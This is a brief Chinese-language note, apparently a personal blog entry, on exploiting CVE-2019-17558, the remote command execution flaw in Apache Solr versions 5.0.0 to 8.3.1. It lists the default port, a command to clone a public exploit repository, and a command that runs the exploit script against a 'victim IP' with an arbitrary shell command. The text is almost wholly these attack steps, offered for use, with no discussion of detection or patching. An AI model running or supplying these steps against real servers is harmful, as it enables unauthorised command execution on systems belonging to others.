【笔记】CVE-2019-17558漏洞利用
前言
通过jas502n/solr_rce实现Java的Solr框架远程命令执行漏洞利用
Solr默认端口号为8983
漏洞利用前提
- Apache Solr >= 5.0.0 <= 8.3.1
下载项目
1 | git clone https://github.com/jas502n/solr_rce.git |
漏洞利用
<ip>
:受害者IP地址<shell>
:远程执行的Shell命令
1 | python2 solr_rce.py http://<ip>:8983 <shell> |